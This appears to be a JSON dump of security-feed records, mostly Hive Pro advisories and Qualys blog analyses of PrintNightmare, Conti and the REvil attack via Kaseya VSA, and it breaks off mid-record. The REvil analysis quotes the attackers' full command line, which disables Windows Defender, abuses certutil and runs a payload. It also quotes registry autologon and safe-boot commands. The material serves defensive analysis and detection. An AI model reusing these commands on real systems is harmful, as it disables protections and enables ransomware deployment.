"integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian 
threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-26T09:19:08", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202137.pdf>)\n\nConti Ransomware targets enterprises who have not patched their systems by exploiting old vulnerabilities. Conti Ransomware steals sensitive information from businesses and demands a ransom in exchange. CISA has issued a warning about the rise in Conti ransomware attacks. 
To avoid becoming a victim of Conti ransomware, the Hive Pro Threat Research team suggested you patch these vulnerabilities.\n\nThe techniques used by the Conti includes:\n\n * T1078 - Valid Accounts\n * T1133 - External Remote Services\n * T1566.001 - Phishing: Spearphishing Attachment\n * T1566.002 - Phishing: Spearphishing Link\n * T1059.003 - Command and Scripting Interpreter: Windows Command Shell\n * T1106 - Native API\n * T1055.001 - Process Injection: Dynamic-link Library Injection\n * T1027 - Obfuscated Files or Information\n * T1140 - Deobfuscate/Decode Files or Information\n * T1110 - Brute Force\n * T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting\n * T1016 - System Network Configuration Discovery\n * T1049 - System Network Connections Discovery\n * T1057 - Process Discovery\n * T1083 - File and Directory Discovery\n * T1135 - Network Share Discovery\n * T1021.002 - Remote Services: SMB/Windows Admin Shares\n * T1080 - Taint Shared Content\n * T1486 - Data Encrypted for Impact\n * T1489 - Service Stop\n * T1490 - Inhibit System Recovery\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIPV4 | 162.244.80[.]235 \n85.93.88[.]165 \n185.141.63[.]120 \n82.118.21[.]1 \n \n#### Patch Links\n\n<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-23T13:47:51", "type": "hivepro", "title": "Are you a victim of the Conti Ransomware?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-09-23T13:47:51", "id": "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "href": "https://www.hivepro.com/are-you-a-victim-of-the-conti-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. 
An emergency patch has been released by Microsoft for some of the versions and a workaround has been made available for other versions.\n\n#### Vulnerability Details\n\n\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-07-28T14:34:25", "description": "On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. The REvil ransomware attack leveraged multiple zero-day vulnerabilities in Kaseya\u2019s VSA (Virtual System/Server Administrator) product that helps Kaseya customers to monitor and manage their infrastructure. To deploy ransomware payloads on the systems of Kaseya customers and their clients, the REvil operators exploited zero-day vulnerability CVE-2021-30116.\n\nREvil ransomware (also known as Sodinokibi) is ransomware-as-a-service (RaaS), meaning an attacker distributes the licensed copy of this ransomware over the internet and the ransom is split between the developers. After an attack, REvil would threaten to publish the information on their page 'Happy Blog' unless the ransom is received.\n\n**Image Source**: [DarkTracer](<https://twitter.com/darktracer_int/status/1411866196199178244>)\n\nThe REvil ransomware group has demanded a $70 million payment to provide a universal decryptor tool to unlock the files corrupted by REvil ransomware.\n\nREvil\u2019s attacks on Kaseya VSA servers have led to outages in unexpected places, such as supermarket chains in Sweden, kindergartens in New Zealand, and some public administration offices in Romania. 
In a message posted on their dark web [blog](<https://twitter.com/darktracer_int/status/1411866196199178244>), the REvil gang officially took credit for the attack for the first time and claimed they locked more than one million systems during the Kaseya incident.\n\nOn July 4, [CISA and FBI](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) published an advisory in response to the REvil attack and urged users to download the [Kaseya VSA Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>), which determines whether any indicators of compromise are present on the system.\n\nKaseya is sharing regular updates on their [website](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-3rd-2021>) and believes that this has been localized to a very small number of on-premises customers only.\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with Kaseya installed:\n\n`software:(publisher:Kaseya and product:\"Kaseya Agent\")`\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cREvil ransomware\u201d. This automatically groups these existing hosts as well as any new systems that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Discover Kaseya VSA Vulnerability\n\nNow that the hosts tagged REvil Ransomware are identified, you want to detect which of these assets are flagged with this vulnerability. 
Qualys VMDR automatically detects new vulnerabilities like Kaseya VSA based on the always updated Knowledgebase.\n\nQualys has released an IG (information gathered) QID to detect the presence of Kaseya VSA.\n\nYou can see all your impacted hosts for this vulnerability tagged with the 'REvil Ransomware\u201d asset tag in the vulnerabilities view by using this QQL query:\n\n`vulnerabilities.vulnerability.qid: 48187`\n\nThis will return a list of all hosts that have Kaseya VSA installed.\n\n\n\nIG QID: 48187 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected remotely.\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n\n\nWith Qualys Unified Dashboard, you can track REvil ransomware, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of Kaseya VSA vulnerability trends, EDR events and ransomware-related compliance controls in your environment using the [REvil ransomware Dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n\n\n### Workarounds\n\nDisable RDP if not used. If required change the RDP port to a non-standard port.\n\nAfter identifying vulnerable assets, monitor them for malicious activity. \n\nAs a best practice, follow these steps:\n\n * Keep operating systems, software, and applications current and up to date.\n * Make sure anti-virus and anti-malware solutions are set to automatically update and run regular scans.\n * Create backup copies of all important data as a good step towards securing the data. 
Backup copies can be kept on physically disconnected systems to maximize security.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical Kaseya VSA vulnerability CVE-2021-30116.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T17:07:54", "type": "qualysblog", "title": "Kaseya REvil Ransomware Attack (CVE-2021-30116) \u2013 Automatically Discover and Prioritize Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T17:07:54", "id": "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:25", "description": "Over the past year, there has been a rise in extortion malware, e.g. 
[Nefilim](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>) and [Darkside](<https://blog.qualys.com/vulnerabilities-research/2021/06/09/darkside-ransomware>), which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.\n\nIn a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers\u2019 goal was monetary gain rather than cyber espionage.\n\nThe attacks have been attributed to REvil, ransomware was first identified in April 2019 according to [MITRE](<https://attack.mitre.org/software/S0496/>). REvil is a ransomware family that has been linked to [GOLD SOUTHFIELD](<https://www.secureworks.com/research/threat-profiles/gold-southfield>), a financially motivated group that operates a \u201cRansomware as a service\u201d model. This group distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers.\n\nREvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.\n\nFig. 
1: Dark website\n\n### **Technical Details**\n\n#### **Initial access**\n\nThe ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability ([CVE-2021-30116](<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>)) in the Kaseya VSA server platform. \n\nSecurity researchers at [Huntress Labs](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) and [TrueSec](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) have identified three zero-day vulnerabilities potentially used in attacks against their clients, including:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability\n\n[Multiple sources](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) have stated that the following procedure was used to install and execute the ransomware on Windows systems:\n\nThe \u201cKaseya VSA Agent Hot-fix\u201d procedure ran the following command: \n\n`\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe`\n\nThe above command disables Windows Defender, copies and renames certutil.exe to 
%SystemDrive%\\Windows, and decodes the agent.crt file. Certutil.exe is commonly used as a \u201cliving-off-the-land\u201d binary: it is capable of downloading and decoding web-encoded content. In order to avoid detection, the attacker copied this utility as %SystemDrive%\\Windows\\cert.exe and executed the malicious payload agent.exe.\n\nagent.exe| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n---|--- \n \nThe agent.exe contains two resources (MODLS.RC, SOFIS.RC) in it as shown in the following image.\n\nFig. 2: Resource from agent.exe\n\nAgent.exe drops these resources in the Windows folder. The resources named MODLIS and SOFTIS are dropped as mpsvc.dll and MsMpEng.exe respectively.\n\nMODLIS| e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n---|--- \nmpsvc.dll| 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \nSOFTIS| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \nMsMpEng.exe| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \n \nMsMpEng.exe is an older version of Microsoft\u2019s Antimalware Service executable which is vulnerable to a DLL side-loading attack. In a DLL side-loading attack, the malicious code is placed in a DLL whose name matches one that the target executable expects to load, so the legitimate, signed executable loads the attacker\u2019s DLL from its own directory and runs the code inside it.\n\nFig. 3: Version information of MsMpEng.exe\n\nFig. 4: Digital certificate information of MsMpEng.exe\n\nAgent.exe then drops MsMpEng.exe and mpsvc.dll. After dropping these two files, agent.exe executes MsMpEng.exe as shown in the following image.\n\nFig. 5: Drop files and create a process of MsMpEng.exe\n\n### **Ransomware Execution**\n\nWhen MsMpEng.exe runs and calls ServiceCrtMain, the malicious mpsvc.dll is loaded and executed.\n\nFig. 6: ServiceCrtMain call function of MsMpEng.exe\n\nFig. 7: ServiceCrtMain call function of MsMpEng.exe\n\nThe ransomware uses OpenSSL to conduct its cryptographic operations.\n\nFig. 
8: Use OpenSSL to conduct Cryptographic Operations\n\nThe malware uses the \u2018CreateFileMappingW\u2019 and \u2018MapViewOfFile\u2019 functions to bring code into memory. \u2018CreateFileMappingW\u2019 creates a file-mapping object for a file and returns a handle to the mapping, while \u2018MapViewOfFile\u2019 maps that file into the process address space and returns a pointer to the start of the mapped view.\n\nFig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory \n\nThe malware allocates memory and decrypts the main payload (a PE file) in memory. To evade detection, it strips the magic constants that are no longer needed from the header, namely 0x4D5A (MZ) and 0x5045 (PE). The payload therefore has to be loaded and executed manually, much like shellcode.\n\nMost malware authors nowadays use custom packers that unpack and load the payload module without the PE header magic constants at load time. These packers keep the other information from the PE header that they still need, such as the section headers, API imports and relocation data.\n\nFig. 10: Main Payload \n\nThe malware then decrypts its configuration. The config file is in JSON format.\n\nFig. 
11: Config File\n\nThe config file contains the following fields.\n\nField| Definition \n---|--- \npk | Public key in base64 \npid | Version ID \nsub | Tag number \ndbg | Is it debug mode \net | Encryption type \nwipe | Wipe folder flag \nfld | Folder list to skip during the encryption process \nfls | File list to skip during the encryption process \next | File extensions to skip during the encryption process \nwfld | The folder it wants to wipe \nprc | Process name list it wants to terminate \ndmn | Potential list of C&C domains \nnet | Communication flag \nsvc | Service name list it wants to stop \nnbody | Ransomware note in base64 format \nnname | Ransomware note file extension \nexp | Flag for local privilege escalation \nimg | Ransomware note that will be in bitmap form \narn | Persistence flag \nrdmcnt | Readme count \n \nThe ransomware makes the following change to the local firewall rules:\n\n`netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes`\n\nFig. 12: Command to change local firewall\n\nIt creates the following registry entry: \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter`\n\nThe following values are added in HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter:\n\n`96Ia6 = {Hex Value}` \n`Ed7 = {Hex Value}` \n`JmfOBvhb = {Hex Value}` \n`QIeQ = {Hex Value}` \n`Ucr1RB = {Hex Value}` \n`wJWsTYE = .{appended extension to files after encryption}`\n\nThe malware adds registry values under the following registry key. \n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon`\n\n * AutoAdminLogon = 1 \n * DefaultUserName = {Current User Name} \n * DefaultPassword = \u201cDTrump4ever\u201d \n\nWith the above registry values, Windows will automatically log on with the new account information. 
\n\nThe malware executes the following command to force the computer to boot into safe mode with networking: \n`bcdedit /set {current} safeboot network`\n\nThe malware also adds the same command to the registry under \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\n\n`*MarineLePen = bcdedit /set {current} safeboot network `\n\nFinally, a ransom note is dropped using a random filename, for example \u201cs5q78-readme.txt\u201d.\n\nFig. 13: Ransom note\n\n### Dashboard\n\nTo track your exposure, download and run the [Kaseya (REvil RansomWare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n### Artifact\n\n * The group launches a zero-day authorization [bypass/SQL injection](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) attack via the userFilterTableRpt.asp file.\n * In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).\n * The group delivers a PowerShell payload that disables Windows Defender.\n * The group copied and renamed certutil.exe to cert.exe before running the commands.\n * The group uses certutil.exe to decode the previously uploaded agent.crt into agent.exe and then executes it.\n * The group uploaded a .js file masqueraded as a .jpg file - screenshot.jpg.\n * The group has used services like Shodan to collect a list of targets before attacking.\n * The group encrypts files on victim systems and demands a ransom to decrypt the files.\n\n### REvil TTP Map\n\nReconnaissance| Initial Access| Execution| Defense Evasion| Command and Control| Impact \n---|---|---|---|---|--- \nSearch Open Technical Databases: Scan Databases (T1596.005)| Exploit Public-Facing Application (T1190)| Command and Scripting Interpreter: PowerShell (T1059.001)| Indicator Removal on Host: File Deletion (T1070.004)| Ingress Tool Transfer (T1105)| Data Manipulation: Stored Data Manipulation (T1565.001) \n| | | Deobfuscate/Decode Files or 
Information (T1140)| | Data Encrypted for Impact (T1486) \n| | | Masquerading (T1036)| | Defacement: Internal Defacement (T1491.001) \n| | | Masquerading: Rename System Utilities (T1036.003)| | \n| | | Hijack Execution Flow: DLL Side-Loading (T1574.002)| | \n| | | Subvert Trust Controls: Code Signing (T1553.002)| | \n| | | Impair Defenses: Disable or Modify System Firewall (T1562.004)| | \n| | | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)| | \n| | | Modify Registry (T1112)| | \n| | | Impair Defenses: Disable or Modify Tools (T1562.001)| | \n \n### **Mitigation and Additional Important Safety Measures**\n\n#### Network\n\n * Keep strong and unique passwords for login accounts.\n * Disable RDP if not used. If required, change the RDP port to a non-standard port.\n * Configure the firewall in the following way:\n   * Deny access from public IPs to important ports (in this case RDP port 3389).\n   * Allow access only to IPs which are under your control.\n * Use a VPN to access the network instead of exposing RDP to the Internet, and consider implementing two-factor authentication (2FA).\n * Set a lockout policy which hinders credential guessing.\n * Create a separate network folder for each user when managing access to shared network folders.\n\n#### **Take regular data backups**\n\n * Protect systems from ransomware by backing up important files regularly and keeping a recent backup copy offline. Encrypt your backups.\n * If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.\n * Always use a combination of online and offline backups.\n * Do not keep offline backups connected to your system, as this data could be encrypted when ransomware strikes.\n\n#### **Keep software updated**\n\n * Always keep your security software (antivirus, firewall, etc.) 
up to date to protect your computer from new variants of malware.\n * Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.\n * Do not download cracked/pirated software, as it risks backdoor entry for malware into your computer.\n * Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.\n\n#### **Use the minimum required privileges**\n\n * Do not assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator. \n\n### Indicators of Compromise (IOCs)\n\nSHA256\n\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\n\n### References\n\n * <https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n * <https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n * <https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>\n * <https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>\n * <https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n * <https://www.secureworks.com/research/threat-profiles/gold-southfield>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:41:59", "type": "qualysblog", "title": "Analyzing the REvil Ransomware Attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T23:41:59", "id": "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-18T18:37:13", "description": "Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. Since its inception, its use has grown rapidly and has even displaced the use of other RaaS tools like Ryuk. The [Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/22/cisa-fbi-and-nsa-release-joint-cybersecurity-advisory-conti>) issued a warning about Conti in Sept 2021, noting that they had observed it being used in more than 400 cyberattacks globally, though concentrated in North America and Europe.\n\nThe most common initial infection vectors used are spear phishing and RDP (Remote Desktop Protocol) services. 
Phishing emails work either through malicious attachments, such as Word documents with an embedded macro that can be used to drop/download BazarLoader, Trickbot, IceID trojans, or via social engineering tactics employed to get the victim to provide additional information or access credentials. Following initial access, attackers download and execute a Cobalt Strike beacon DLL to gather information about domain admin accounts. Additionally, threat actors use Kerberos attacks to attempt to get admin hash in order to conduct brute force attacks.\n\nA Conti affiliate recently leaked what has been dubbed the [Conti playbook](<https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/>). The playbook revealed that Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim\u2019s network. They check for the "PrintNightmare" vulnerability (CVE-2021-34527) in Windows Print spooler service, EternalBlue vulnerability (CVE-2017-0144) in Microsoft Windows Server Message Block, and the "Zerologon" vulnerability (CVE-2020-1472) in Microsoft Active Directory Domain Controller. The playbook has been translated from Russian to English by security researchers and has provided other useful Indicators of Compromise (IoC).\n\nConti actors also use the RouterScan tool to identify router devices in a provided range of IPs and attempt to find logins/passwords from a standard list available with the RouterScan tool. They then install AnyDesk or Atera on the target machine to maintain an open communication channel. Like other ransomware attacks, Conti actors exfiltrate data from victims\u2019 networks to cloud storage services like MEGA and then deploy Conti ransomware. To upload data on cloud storage Conti uses open-source Rclone command-line software. 
They use a double extortion approach in which they demand a ransom to release the encrypted data or threaten to publicly release it if a ransom is not paid. They may also sell the data to the highest bidder.\n\n### Technical Details:\n\nConti ransomware uses obfuscation. The most notable use is to hide various Windows API calls used by the malware. It is common for some malware to lookup API calls during execution. Initially, it brings import module names then decrypts the API names and gets their addresses.\n\nFig. 1 De-obfuscation of Windows API\n\nConti uses a unique String Decryption Routine that is applied to almost every string text or API name used by the malware as shown in Fig. 2:\n\nFig. 2 String Decryption Routine\n\nAfter getting API addresses, it calls for `CreateMutexA` API with the Mutex Value of "_CONTI_" as shown below in Fig. 3:\n\nFig. 3 Create Mutex\n\nIt deletes Windows Volume Shadow Copies and also resizes shadow storage for drives C to H:\n\nFig. 4 Deletes Windows Volume Shadow Copy\n\nNext, Conti executes commands for stopping potential Windows Services related to antivirus, security, backup, database, and email solutions:\n\nFig. 5 Stop Potential Windows Services\n\nThe table below contains the names of the Windows Services that Conti stopped by calling the code in Fig. 
